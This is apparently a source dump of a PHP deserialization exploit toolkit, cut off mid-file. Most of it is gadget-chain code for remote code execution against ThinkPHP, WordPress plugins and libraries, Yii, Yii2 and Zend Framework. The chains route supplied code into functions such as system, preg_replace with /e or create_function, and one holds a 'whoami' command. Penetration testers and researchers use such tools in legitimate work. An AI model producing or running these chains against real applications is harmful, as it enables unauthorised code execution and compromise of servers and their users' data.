/gadgetchains/ThinkPHP/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | Pivot 9 | private $withAttr = []; # assert 10 | protected $hidden = []; 11 | private $data = []; 12 | protected $withEvent = false; 13 | private $force = false; 14 | protected $field = []; 15 | protected $schema = []; 16 | 17 | function __construct($func, $val){ 18 | $this->lazySave = true; 19 | $this->exists = true; 20 | $this->withEvent = false; 21 | $this->force = true; 22 | $this->connection = "mysql"; 23 | $this->withAttr = ["test"=>$func]; 24 | $this->data = ["test"=>$val]; 25 | $this->hidden = ["test"=>"123"]; 26 | 27 | $this->field = []; 28 | $this->schema = []; 29 | } 30 | } 31 | namespace think\model; 32 | use think\Model; 33 | # Model 是一个抽象类,我们找到它的继承类,此处选取的是 Pivot 类 34 | class Pivot extends Model{ 35 | function __construct($obj="", $func, $val){ 36 | parent::__construct($func, $val); 37 | $this->name = $obj; # $this->name放子类构造方法中赋值,直接放基类属性中初始化不成功 38 | } 39 | } -------------------------------------------------------------------------------- /gadgetchains/ThinkPHP/RCE/3/chain.php: -------------------------------------------------------------------------------- 1 | \ adapter = new \think\cache\driver\Memcache($code); 15 | } 16 | } 17 | } 18 | 19 | namespace think\cache { 20 | abstract class Driver { 21 | protected $handler = null; 22 | protected $options = [ 23 | "prefix" => "" 24 | ]; 25 | 26 | public function __construct($code) 27 | { 28 | $this->handler = new \think\Request($code); 29 | } 30 | } 31 | } 32 | 33 | namespace think\cache\driver { 34 | class Memcache extends \think\cache\Driver { 35 | public function __construct($code) 36 | { 37 | parent::__construct($code); 38 | } 39 | } 40 | } 41 | 42 | namespace think { 43 | class Request { 44 | protected $get; 45 | protected $filter; 46 | 47 | public function __construct($code) { 48 | $this->filter = [ 49 | 0 => [new \think\view\driver\Php, "display"], 50 | ]; 51 | $this->get = ["" 17 | ); 18 | } 19 | } -------------------------------------------------------------------------------- /gadgetchains/ThinkPHP/RCE/4/gadgets.php: -------------------------------------------------------------------------------- 1 | []]; 7 | 8 | public function __construct($func, $cmd){ 9 | $this->relation = false; 10 | $this->data = ['4ut15m'=>$cmd]; //任意值,value 11 | $this->withAttr = ['4ut15m'=>$func]; 12 | } 13 | } 14 | } 15 | 16 | namespace think\model { 17 | use think\Model; 18 | class Pivot extends Model{ 19 | } 20 | } 21 | 22 | 23 | namespace think\process\pipes { 24 | use think\model\Pivot; 25 | class Windows{ 26 | private $files = []; 27 | 28 | public function __construct($func, $cmd){ 29 | $this->files = [new Pivot($func, $cmd)]; //Conversion类 30 | } 31 | 32 | } 33 | } 34 | 35 | namespace think\view\driver { 36 | class Php {} 37 | } 38 | -------------------------------------------------------------------------------- /gadgetchains/ThinkPHP/RCE/5/chain.php: -------------------------------------------------------------------------------- 1 | files = [$files]; //$file => /think/Model的子类new Pivot(); Model是抽象类 14 | } 15 | } 16 | } 17 | 18 | namespace think { 19 | 20 | abstract class Model 21 | { 22 | 23 | protected $append = []; 24 | protected $error = null; 25 | public $parent; 26 | 27 | function __construct($output, $modelRelation) 28 | { 29 | 30 | $this->parent = $output; //$this->parent=> think\console\Output; 31 | $this->append = array("xxx" => "getError"); //调用getError 返回this->error 32 | $this->error = $modelRelation; // $this->error 要为 relation类的子类,并且也是OnetoOne类的子类==>>HasOne 33 | } 34 | } 35 | 36 | class Request 37 | { 38 | protected $get = ['gml' => 'whoami']; 39 | protected $filter = ['system', 'a']; 40 | 41 | public function __construct($code) 42 | { 43 | $this->get = ['gml' => ""]; 44 | $this->filter = [[new \think\view\driver\Php, "display"], 'a']; 45 | } 46 | } 47 | } 48 | 49 | namespace think\model { 50 | 51 | use think\Model; 52 | 53 | class Pivot extends Model 54 | { 55 | 56 | function __construct($output, $modelRelation) 57 | { 58 | 59 | parent::__construct($output, $modelRelation); 60 | } 61 | } 62 | } 63 | 64 | namespace think\model\relation { 65 | 66 | class HasOne extends OneToOne 67 | { 68 | 69 | 70 | } 71 | 72 | 73 | abstract class OneToOne 74 | { 75 | 76 | protected $selfRelation; 77 | protected $bindAttr = []; 78 | protected $query; 79 | 80 | function __construct($query) 81 | { 82 | 83 | $this->selfRelation = 0; 84 | $this->query = $query; //$query指向Query 85 | $this->bindAttr = ['xxx'];// $value值,作为call函数引用的第二变量 86 | } 87 | } 88 | 89 | } 90 | 91 | namespace think\db { 92 | 93 | class Query 94 | { 95 | 96 | protected $model; 97 | 98 | function __construct($model) 99 | { 100 | 101 | $this->model = $model; //$this->model=> think\console\Output; 102 | } 103 | } 104 | } 105 | 106 | namespace think\console { 107 | 108 | use think\session\driver\Memcached; 109 | 110 | class Output 111 | { 112 | 113 | private $handle; 114 | protected $styles; 115 | 116 | function __construct($code) 117 | { 118 | 119 | $this->styles = ['getAttr']; 120 | $this->handle = new Memcached($code); //$handle->think\session\driver\Memcached 121 | } 122 | 123 | } 124 | } 125 | 126 | namespace think\session\driver { 127 | 128 | use think\cache\driver\Memcache; 129 | 130 | class Memcached 131 | { 132 | 133 | protected $handler; 134 | protected $config = [ 135 | 'session_name' => '//', 136 | 'expire' => '1' 137 | ]; 138 | 139 | function __construct($code) 140 | { 141 | 142 | $this->handler = new Memcache($code); 143 | } 144 | } 145 | } 146 | 147 | namespace think\cache\driver { 148 | 149 | use think\Request; 150 | 151 | class Memcache 152 | { 153 | protected $handler; 154 | protected $tag = 1; 155 | protected $options = ['prefix' => 'gml/']; 156 | 157 | function __construct($code) 158 | { 159 | $this->handler = new Request($code); 160 | } 161 | } 162 | 163 | } 164 | 165 | namespace think\view\driver { 166 | class Php { 167 | 168 | } 169 | } -------------------------------------------------------------------------------- /gadgetchains/ThinkPHP/RCE/6/chain.php: -------------------------------------------------------------------------------- 1 | cache = [""=>""]; 25 | $this->store = $store; 26 | } 27 | } 28 | } 29 | 30 | namespace think\cache{ 31 | abstract class Driver 32 | { 33 | protected $options = ["serialize"=>[[]],"expire"=>1,"prefix"=>"1","hash_type"=>"sha256","cache_subdir"=>"1","path"=>"1"]; 34 | function __construct() { 35 | $this->options["serialize"][0] = [new \think\view\driver\Php(), "display"]; 36 | } 37 | } 38 | } 39 | 40 | namespace think\cache\driver{ 41 | class File extends \think\cache\Driver{ 42 | 43 | } 44 | } -------------------------------------------------------------------------------- /gadgetchains/ThinkPHP/RCE/7/chain.php: -------------------------------------------------------------------------------- 1 | "); 15 | } 16 | } -------------------------------------------------------------------------------- /gadgetchains/ThinkPHP/RCE/7/gadgets.php: -------------------------------------------------------------------------------- 1 | lazySave = true; 20 | $this->withEvent = false; 21 | $this->table = new route\Url(new Middleware,new Validate,$cmd); 22 | } 23 | } 24 | class Middleware{ 25 | public $request = 2333; 26 | } 27 | class Validate{ 28 | protected $type; 29 | function __construct(){ 30 | $this->type = [ 31 | "getDomainBind" => [new view\driver\Php,'display'] 32 | ]; 33 | } 34 | } 35 | } 36 | 37 | namespace think\model{ 38 | use think\Model; 39 | class Pivot extends Model{} 40 | } 41 | 42 | namespace think\route{ 43 | class Url 44 | { 45 | protected $url = 'a:'; 46 | protected $domain; 47 | protected $app; 48 | protected $route; 49 | function __construct($app,$route,$cmd){ 50 | $this->domain = $cmd; 51 | $this->app = $app; 52 | $this->route = $route; 53 | } 54 | } 55 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/Dompdf/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | _image_cache = $image_cache; 20 | } 21 | 22 | /* 23 | public function __destruct() 24 | { 25 | foreach ($this->_image_cache as $img) { 26 | // The file might be already deleted by 3rd party tmp cleaner, 27 | // the file might not have been created at all 28 | // (if image outputting commands failed) 29 | // or because the destructor was called twice accidentally. 30 | if (!file_exists($img)) { 31 | continue; 32 | } 33 | 34 | if ($this->_dompdf->getOptions()->getDebugPng()) { 35 | print '[__destruct unlink ' . $img . ']'; 36 | } 37 | if (!$this->_dompdf->getOptions()->getDebugKeepTemp()) { 38 | unlink($img); 39 | } 40 | } 41 | } 42 | */ 43 | } 44 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/Dompdf/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | _image_cache = $image_cache; 19 | } 20 | 21 | /* 22 | public function __destruct() 23 | { 24 | foreach ($this->_image_cache as $img) { 25 | // The file might be already deleted by 3rd party tmp cleaner, 26 | // the file might not have been created at all 27 | // (if image outputting commands failed) 28 | // or because the destructor was called twice accidentally. 29 | if (!file_exists($img)) { 30 | continue; 31 | } 32 | 33 | if ($this->_dompdf->getOptions()->getDebugPng()) { 34 | print '[__destruct unlink ' . $img . ']'; 35 | } 36 | if (!$this->_dompdf->getOptions()->getDebugKeepTemp()) { 37 | unlink($img); 38 | } 39 | } 40 | } 41 | */ 42 | } 43 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/Guzzle/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | $parameter, 'Value' => ''], $function) 19 | ); 20 | } 21 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/Guzzle/RCE/1/gadgets.php: -------------------------------------------------------------------------------- 1 | data = $data; 17 | } 18 | 19 | /* 20 | public function __toString() 21 | { 22 | $str = $this->data['Name'] . '=' . $this->data['Value'] . '; '; 23 | foreach ($this->data as $k => $v) { 24 | if ($k !== 'Name' && $k !== 'Value' && $v !== null && $v !== false) { 25 | if ($k === 'Expires') { 26 | $str .= 'Expires=' . gmdate('D, d M Y H:i:s \G\M\T', $v) . '; '; 27 | } else { 28 | $str .= ($v === true ? $k : "{$k}={$v}") . '; '; 29 | } 30 | } 31 | } 32 | return rtrim($str, '; '); 33 | } 34 | */ 35 | } 36 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/Guzzle/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | $parameter, 'Value' => ''], $function) 19 | ); 20 | 21 | return new \GuzzleHttp\Cookie\FileCookieJar($g); 22 | } 23 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/Guzzle/RCE/2/gadgets.php: -------------------------------------------------------------------------------- 1 | data = $data; 17 | } 18 | 19 | /* 20 | 21 | public function __toString() 22 | { 23 | $str = $this->data['Name'] . '=' . $this->data['Value'] . '; '; 24 | foreach ($this->data as $k => $v) { 25 | if ($k !== 'Name' && $k !== 'Value' && $v !== null && $v !== false) { 26 | if ($k === 'Expires') { 27 | $str .= 'Expires=' . gmdate('D, d M Y H:i:s \G\M\T', $v) . '; '; 28 | } else { 29 | $str .= ($v === true ? $k : "{$k}={$v}") . '; '; 30 | } 31 | } 32 | } 33 | return rtrim($str, '; '); 34 | } 35 | 36 | */ 37 | } 38 | class FileCookieJar 39 | { 40 | private $filename; 41 | 42 | public function __construct($cookieFile, $storeSessionCookies = \false) 43 | { 44 | $this->filename = $cookieFile; 45 | } 46 | 47 | /* 48 | 49 | public function __destruct() 50 | { 51 | $this->save($this->filename); 52 | } 53 | 54 | public function save($filename) 55 | { 56 | $json = []; 57 | foreach ($this as $cookie) { 58 | if (\GuzzleHttp\Cookie\CookieJar::shouldPersist($cookie, $this->storeSessionCookies)) { 59 | $json[] = $cookie->toArray(); 60 | } 61 | } 62 | $jsonStr = \GuzzleHttp\json_encode($json); 63 | if (\false === \file_put_contents($filename, $jsonStr)) { 64 | throw new \RuntimeException("Unable to save file {$filename}"); 65 | } 66 | } 67 | 68 | */ 69 | } 70 | 71 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/P/EmailSubscribers/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | handles = $handles; 12 | } 13 | 14 | /* 15 | public function __destruct() { 16 | foreach ( $this->handles as $handle ) { 17 | if ( is_resource( $handle ) ) { 18 | fclose( $handle ); // @codingStandardsIgnoreLine. 19 | } 20 | } 21 | } 22 | */ 23 | } 24 | -------------------------------------------------------------------------------- /gadgetchains/WordPress/P/EverestForms/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | handles = $handles; 12 | } 13 | 14 | /* 15 | public function __destruct() { 16 | foreach ( $this->handles as $handle ) { 17 | if ( is_resource( $handle ) ) { 18 | fclose( $handle ); // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_read_fclose 19 | } 20 | } 21 | } 22 | */ 23 | } 24 | -------------------------------------------------------------------------------- /gadgetchains/WordPress/P/WooCommerce/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | handles = $handles; 12 | } 13 | 14 | /* 15 | public function __destruct() { 16 | foreach ( $this->handles as $handle ) { 17 | if ( is_resource( $handle ) ) { 18 | fclose( $handle ); // @codingStandardsIgnoreLine. 19 | } 20 | } 21 | } 22 | */ 23 | } 24 | -------------------------------------------------------------------------------- /gadgetchains/WordPress/P/WooCommerce/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | _handles = $handles; 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /gadgetchains/WordPress/P/YetAnotherStarsRating/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | richTextElements = $richTextElements; 11 | } 12 | 13 | /* 14 | public function getPlainText() { 15 | // Return value 16 | $returnValue = ''; 17 | 18 | // Loop through all PHPExcel_RichText_ITextElement 19 | foreach ($this->richTextElements as $text) { 20 | $returnValue .= $text->getText(); 21 | } 22 | 23 | // Return 24 | return $returnValue; 25 | } 26 | 27 | public function __toString() { 28 | return $this->getPlainText(); 29 | } 30 | */ 31 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/PHPExcel/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | _richTextElements = $richTextElements; 11 | } 12 | 13 | /* 14 | public function getPlainText() { 15 | // Return value 16 | $returnValue = ''; 17 | 18 | // Loop through all PHPExcel_RichText_ITextElement 19 | foreach ($this->_richTextElements as $text) { 20 | $returnValue .= $text->getText(); 21 | } 22 | 23 | // Return 24 | return $returnValue; 25 | } 26 | 27 | public function __toString() { 28 | return $this->getPlainText(); 29 | } 30 | */ 31 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/PHPExcel/RCE/3/chain.php: -------------------------------------------------------------------------------- 1 | richTextElements = $richTextElements; 11 | } 12 | 13 | /* 14 | public function getPlainText() { 15 | // Return value 16 | $returnValue = ''; 17 | 18 | // Loop through all PHPExcel_RichText_ITextElement 19 | foreach ($this->richTextElements as $text) { 20 | $returnValue .= $text->getText(); 21 | } 22 | 23 | // Return 24 | return $returnValue; 25 | } 26 | 27 | public function __toString() { 28 | return $this->getPlainText(); 29 | } 30 | */ 31 | } 32 | 33 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php 34 | class PHPExcel_CachedObjectStorage_DiscISAM { 35 | private $fileName = null; 36 | private $fileHandle = 42; 37 | 38 | public function __construct($filePath) { 39 | $this->fileName = $filePath; 40 | } 41 | 42 | /* 43 | public function __destruct() { 44 | if (!is_null($this->fileHandle)) { 45 | fclose($this->fileHandle); // Will only produce a warning 46 | unlink($this->fileName); // Passing an object will call its __toString(), triggering the RCE 47 | } 48 | $this->fileHandle = null; 49 | } 50 | */ 51 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/PHPExcel/RCE/4/chain.php: -------------------------------------------------------------------------------- 1 | _richTextElements = $richTextElements; 11 | } 12 | 13 | /* 14 | public function getPlainText() { 15 | // Return value 16 | $returnValue = ''; 17 | 18 | // Loop through all PHPExcel_RichText_ITextElement 19 | foreach ($this->_richTextElements as $text) { 20 | $returnValue .= $text->getText(); 21 | } 22 | 23 | // Return 24 | return $returnValue; 25 | } 26 | 27 | public function __toString() { 28 | return $this->getPlainText(); 29 | } 30 | */ 31 | } 32 | 33 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php 34 | class PHPExcel_CachedObjectStorage_DiscISAM { 35 | private $_fileName = null; 36 | private $_fileHandle = 42; 37 | 38 | public function __construct($filePath) { 39 | $this->_fileName = $filePath; 40 | } 41 | 42 | /* 43 | public function __destruct() { 44 | if (!is_null($this->_fileHandle)) { 45 | fclose($this->_fileHandle); // Will only produce a warning 46 | unlink($this->_fileName); // Passing an object will call its __toString(), triggering the RCE 47 | } 48 | $this->fileHandle = null; 49 | } 50 | */ 51 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/PHPExcel/RCE/5/chain.php: -------------------------------------------------------------------------------- 1 | richTextElements = $richTextElements; 11 | } 12 | 13 | /* 14 | public function getPlainText() { 15 | // Return value 16 | $returnValue = ''; 17 | 18 | // Loop through all PHPExcel_RichText_ITextElement 19 | foreach ($this->richTextElements as $text) { 20 | $returnValue .= $text->getText(); 21 | } 22 | 23 | // Return 24 | return $returnValue; 25 | } 26 | 27 | public function __toString() { 28 | return $this->getPlainText(); 29 | } 30 | */ 31 | } 32 | 33 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/Shared/XMLWriter.php 34 | class PHPExcel_Shared_XMLWriter { 35 | private $tempFileName = ''; 36 | 37 | public function __construct($filePath) { 38 | $this->tempFileName = $filePath; 39 | } 40 | 41 | /* 42 | public function __destruct() 43 | { 44 | // Unlink temporary files 45 | if ($this->tempFileName != '') { 46 | @unlink($this->tempFileName); // Passing an object will call its __toString(), triggering the RCE 47 | } 48 | } 49 | */ 50 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/PHPExcel/RCE/6/chain.php: -------------------------------------------------------------------------------- 1 | _richTextElements = $richTextElements; 11 | } 12 | 13 | /* 14 | public function getPlainText() { 15 | // Return value 16 | $returnValue = ''; 17 | 18 | // Loop through all PHPExcel_RichText_ITextElement 19 | foreach ($this->_richTextElements as $text) { 20 | $returnValue .= $text->getText(); 21 | } 22 | 23 | // Return 24 | return $returnValue; 25 | } 26 | 27 | public function __toString() { 28 | return $this->getPlainText(); 29 | } 30 | */ 31 | } 32 | 33 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/Shared/XMLWriter.php 34 | class PHPExcel_Shared_XMLWriter { 35 | private $_tempFileName = ''; 36 | 37 | public function __construct($filePath) { 38 | $this->_tempFileName = $filePath; 39 | } 40 | 41 | /* 42 | public function __destruct() 43 | { 44 | // Unlink temporary files 45 | if ($this->_tempFileName != '') { 46 | @unlink($this->_tempFileName); // Passing an object will call its __toString(), triggering the RCE 47 | } 48 | } 49 | */ 50 | } -------------------------------------------------------------------------------- /gadgetchains/WordPress/generic/gadgets.php: -------------------------------------------------------------------------------- 1 | callback = $callback; 42 | } 43 | 44 | /* 45 | public function current() { 46 | $value = parent::current(); 47 | $value = call_user_func($this->callback, $value); 48 | return $value; 49 | } 50 | */ 51 | } -------------------------------------------------------------------------------- /gadgetchains/Yii/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | _d = $_d; 12 | } 13 | } 14 | 15 | class CDbCriteria 16 | { 17 | function __construct($params) 18 | { 19 | $this->params = $params; 20 | } 21 | } 22 | 23 | class CFileCache 24 | { 25 | public $keyPrefix = ''; 26 | public $hashKey = false; 27 | public $serializer; 28 | 29 | public $cachePath = 'data:text/'; 30 | public $directoryLevel = 0; 31 | public $embedExpiry = true; 32 | public $cacheFileSuffix; 33 | 34 | function __construct($function, $cacheFileSuffix) 35 | { 36 | $this->serializer = [1 => $function]; 37 | $this->cacheFileSuffix = ';base64,' . $cacheFileSuffix; 38 | } 39 | } -------------------------------------------------------------------------------- /gadgetchains/Yii2/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | categoryMap = $categoryMap; 10 | } 11 | } 12 | 13 | class Connection { 14 | public $pdo = 1; 15 | 16 | function __construct($dsn) { 17 | $this->dsn = $dsn; 18 | } 19 | } 20 | 21 | class BatchQueryResult { 22 | private $_dataReader; 23 | 24 | function __construct($dataReader) { 25 | $this->_dataReader = $dataReader; 26 | } 27 | } 28 | } 29 | 30 | namespace yii\caching { 31 | class ArrayCache { 32 | public $serializer; 33 | private $_cache; 34 | 35 | function __construct($function, $parameter) { 36 | $this->serializer = [1 => $function]; 37 | $this->_cache = ['x' => [$parameter, 0]]; 38 | } 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /gadgetchains/Yii2/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | writeCallback = $writeCallback; 10 | } 11 | } 12 | } 13 | 14 | namespace yii\caching 15 | { 16 | class ExpressionDependency 17 | { 18 | public $expression; 19 | 20 | function __construct($expression) { 21 | $this->expression = $expression; 22 | } 23 | } 24 | } 25 | 26 | namespace yii\db { 27 | class BatchQueryResult { 28 | private $_dataReader; 29 | 30 | function __construct($dataReader) { 31 | $this->_dataReader = $dataReader; 32 | } 33 | } 34 | } 35 | 36 | ?> 37 | -------------------------------------------------------------------------------- /gadgetchains/Yii2/RCE/3/chain.php: -------------------------------------------------------------------------------- 1 | processes = [new \Faker\ValidGenerator($code)]; 9 | } 10 | } 11 | } 12 | 13 | namespace Faker { 14 | class ValidGenerator { 15 | protected $generator; 16 | protected $validator; 17 | protected $maxRetries; 18 | 19 | public function __construct($code) 20 | { 21 | $this->generator = new DefaultGenerator($code); 22 | $this->maxRetries = 1; 23 | $this->validator = [new \yii\base\View(), "evaluateDynamicContent"]; 24 | } 25 | } 26 | 27 | class DefaultGenerator { 28 | protected $default; 29 | 30 | public function __construct($code) 31 | { 32 | $this->default = $code; 33 | } 34 | } 35 | } 36 | 37 | namespace yii\base { 38 | class View {} 39 | } 40 | -------------------------------------------------------------------------------- /gadgetchains/ZendFramework/FD/1/chain.php: -------------------------------------------------------------------------------- 1 | _cleanup = $cleanup; 13 | $this->stream_name = $stream_name; 14 | } 15 | 16 | } -------------------------------------------------------------------------------- /gadgetchains/ZendFramework/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | = 7.0.0 14 | - Payload gets executed twice 15 | '; 16 | 17 | public function generate(array $parameters) 18 | { 19 | $code = $parameters['code']; 20 | 21 | return new \Zend_Log( 22 | [new \Zend_Log_Writer_Mail( 23 | [1], 24 | [], 25 | new \Zend_Mail, 26 | new \Zend_Layout( 27 | new \Zend_Filter_PregReplace( 28 | "/(.*)/e", 29 | $code 30 | ), 31 | true, 32 | "layout" 33 | ) 34 | )] 35 | ); 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /gadgetchains/ZendFramework/RCE/1/gadgets.php: -------------------------------------------------------------------------------- 1 | _writers = $x; 10 | } 11 | } 12 | 13 | class Zend_Log_Writer_Mail 14 | { 15 | protected $_eventsToMail; 16 | protected $_layoutEventsToMail; 17 | protected $_mail; 18 | protected $_layout; 19 | protected $_subjectPrependText; 20 | 21 | public function __construct( 22 | $eventsToMail, 23 | $layoutEventsToMail, 24 | $mail, 25 | $layout 26 | ) { 27 | $this->_eventsToMail = $eventsToMail; 28 | $this->_layoutEventsToMail = $layoutEventsToMail; 29 | $this->_mail = $mail; 30 | $this->_layout = $layout; 31 | $this->_subjectPrependText = null; 32 | } 33 | } 34 | 35 | class Zend_Mail 36 | {} 37 | 38 | class Zend_Layout 39 | { 40 | protected $_inflector; 41 | protected $_inflectorEnabled; 42 | protected $_layout; 43 | 44 | public function __construct( 45 | $inflector, 46 | $inflectorEnabled, 47 | $layout 48 | ) { 49 | $this->_inflector = $inflector; 50 | $this->_inflectorEnabled = $inflectorEnabled; 51 | $this->_layout = $layout; 52 | } 53 | } 54 | 55 | class Zend_Filter_PregReplace 56 | { 57 | protected $_matchPattern; 58 | protected $_replacement; 59 | 60 | public function __construct( 61 | $matchPattern, 62 | $replacement 63 | ) { 64 | $this->_matchPattern = $matchPattern; 65 | $this->_replacement = $replacement; 66 | } 67 | } 68 | -------------------------------------------------------------------------------- /gadgetchains/ZendFramework/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | _name = $_name; 41 | $this->id = $id; 42 | $this->_decorators = $_decorators; 43 | $this->_view = $_view; 44 | } 45 | } 46 | 47 | class Zend_Form_Decorator_Form extends Zend_Form_Decorator_Abstract 48 | { 49 | protected $_helper = 'call'; 50 | } 51 | 52 | abstract class Zend_Form_Decorator_Abstract 53 | { 54 | protected $_placement = 'APPEND'; 55 | protected $_element; 56 | protected $_options = array(); 57 | protected $_separator = PHP_EOL; 58 | } 59 | 60 | class Zend_Cache_Frontend_Function 61 | { 62 | protected $_specificOptions = array( 63 | 'cache_by_default' => false, 64 | 'cached_functions' => array(), 65 | 'non_cached_functions' => array() 66 | ); 67 | } -------------------------------------------------------------------------------- /gadgetchains/ZendFramework/RCE/3/chain.php: -------------------------------------------------------------------------------- 1 | writers = array( 8 | new \Zend\Log\Writer\Mail($function, $param) 9 | ); 10 | } 11 | } 12 | } 13 | 14 | namespace Zend\Log\Writer { 15 | class Mail { 16 | protected $eventsToMail; 17 | protected $subjectPrependText; 18 | protected $numEntriesPerPriority; 19 | 20 | function __construct($function, $param) { 21 | $this->eventsToMail = array(0); 22 | $this->subjectPrependText = ""; 23 | $this->numEntriesPerPriority = array( 24 | 0 => new \Zend\Tag\Cloud($function, $param) 25 | ); 26 | } 27 | } 28 | } 29 | 30 | namespace Zend\Tag { 31 | class Cloud { 32 | protected $tags; 33 | protected $tagDecorator; 34 | 35 | function __construct($function, $param) { 36 | $this->tags = array(""); 37 | $this->tagDecorator = new \Zend\Tag\Cloud\Decorator\HtmlCloud($function, $param); 38 | } 39 | } 40 | } 41 | 42 | namespace Zend\Tag\Cloud\Decorator { 43 | class HtmlCloud { 44 | protected $separator; 45 | protected $escaper; 46 | protected $htmlTags; 47 | 48 | function __construct($function, $param) { 49 | $this->separator = ""; 50 | $this->htmlTags = array( 51 | "h" => array( 52 | "a" => "!" 53 | ) 54 | ); 55 | $this->escaper = new \Zend\Escaper\Escaper($function, $param); 56 | } 57 | } 58 | } 59 | 60 | namespace Zend\Escaper { 61 | class Escaper { 62 | protected $htmlAttrMatcher; 63 | 64 | function __construct($function, $param) { 65 | $this->htmlAttrMatcher = array( 66 | new \Zend\Filter\FilterChain($function, $param), 67 | "filter" 68 | ); 69 | } 70 | } 71 | } 72 | 73 | namespace Zend\Filter { 74 | class FilterChain { 75 | protected $filters; 76 | 77 | function __construct($function, $param) { 78 | $this->filters = new \SplFixedArray(2); 79 | $this->filters[0] = array( 80 | new \Zend\Json\Expr($param), 81 | "__toString" 82 | ); 83 | $this->filters[1] = $function; 84 | } 85 | } 86 | } 87 | 88 | namespace Zend\Json { 89 | class Expr { 90 | protected $expression; 91 | 92 | function __construct($param) { 93 | $this->expression = $param; 94 | } 95 | } 96 | } 97 | -------------------------------------------------------------------------------- /gadgetchains/ZendFramework/RCE/4/chain.php: -------------------------------------------------------------------------------- 1 | = 7.0.0 14 | '; 15 | 16 | public function generate(array $parameters) 17 | { 18 | return new \Zend_Log( 19 | [new \Zend_Log_Writer_Mail( 20 | [1], 21 | [], 22 | new \Zend_Mail, 23 | new \Zend_Layout( 24 | new \Zend_Filter_Inflector(), 25 | true, 26 | $parameters['code'] 27 | ) 28 | )] 29 | ); 30 | } 31 | } -------------------------------------------------------------------------------- /gadgetchains/ZendFramework/RCE/4/gadgets.php: -------------------------------------------------------------------------------- 1 | _writers = $x; 10 | } 11 | } 12 | 13 | class Zend_Log_Writer_Mail 14 | { 15 | protected $_eventsToMail; 16 | protected $_layoutEventsToMail; 17 | protected $_mail; 18 | protected $_layout; 19 | protected $_subjectPrependText; 20 | 21 | public function __construct( 22 | $eventsToMail, 23 | $layoutEventsToMail, 24 | $mail, 25 | $layout 26 | ) { 27 | $this->_eventsToMail = $eventsToMail; 28 | $this->_layoutEventsToMail = $layoutEventsToMail; 29 | $this->_mail = $mail; 30 | $this->_layout = $layout; 31 | $this->_subjectPrependText = null; 32 | } 33 | } 34 | 35 | class Zend_Mail 36 | { 37 | } 38 | 39 | class Zend_Layout 40 | { 41 | protected $_inflector; 42 | protected $_inflectorEnabled; 43 | protected $_layout; 44 | 45 | public function __construct( 46 | $inflector, 47 | $inflectorEnabled, 48 | $layout 49 | ) { 50 | $this->_inflector = $inflector; 51 | $this->_inflectorEnabled = $inflectorEnabled; 52 | $this->_layout = '){}' . $layout . '/*'; 53 | } 54 | } 55 | 56 | class Zend_Filter_Callback 57 | { 58 | protected $_callback = "create_function"; 59 | protected $_options = [""]; 60 | } 61 | 62 | class Zend_Filter_Inflector 63 | { 64 | protected $_rules = []; 65 | 66 | public function __construct() 67 | { 68 | $this->_rules['script'] = [new Zend_Filter_Callback()]; 69 | } 70 | } -------------------------------------------------------------------------------- /gadgetchains/ZendFramework/RCE/5/chain.php: -------------------------------------------------------------------------------- 1 | writers = [new \Zend\Log\Writer\Mail($func, $param)]; 10 | } 11 | } 12 | } 13 | 14 | namespace Zend\Log\Writer { 15 | class Mail { 16 | protected $mail; 17 | protected $eventsToMail; 18 | protected $subjectPrependText; 19 | 20 | function __construct($func, $param) 21 | { 22 | $this->mail = new \Zend\View\Renderer\PhpRenderer($func); 23 | $this->eventsToMail = [$param]; 24 | $this->subjectPrependText = null; 25 | } 26 | 27 | } 28 | } 29 | 30 | namespace Zend\View\Renderer { 31 | class PhpRenderer { 32 | private $__helpers; 33 | 34 | function __construct($func) 35 | { 36 | $this->__helpers = new \Zend\View\Resolver\TemplateMapResolver($func); 37 | } 38 | } 39 | } 40 | 41 | namespace Zend\View\Resolver { 42 | class TemplateMapResolver { 43 | protected $map; 44 | 45 | function __construct($func) 46 | { 47 | $this->map = [ 48 | "setBody" => $func, 49 | ]; 50 | } 51 | } 52 | } -------------------------------------------------------------------------------- /lib/PHPGGC/Enhancement/ASCIIStrings.php: -------------------------------------------------------------------------------- 1 | B"; -> S:5:"A\00B\09\0D"; 10 | * This is experimental and it might not work in some cases. 11 | */ 12 | class ASCIIStrings extends Enhancement 13 | { 14 | public function process_serialized($serialized) 15 | { 16 | $new = ''; 17 | $last = 0; 18 | $current = 0; 19 | $pattern = '#\bs:([0-9]+):"#'; 20 | 21 | while( 22 | $current < strlen($serialized) && 23 | preg_match( 24 | $pattern, $serialized, $matches, 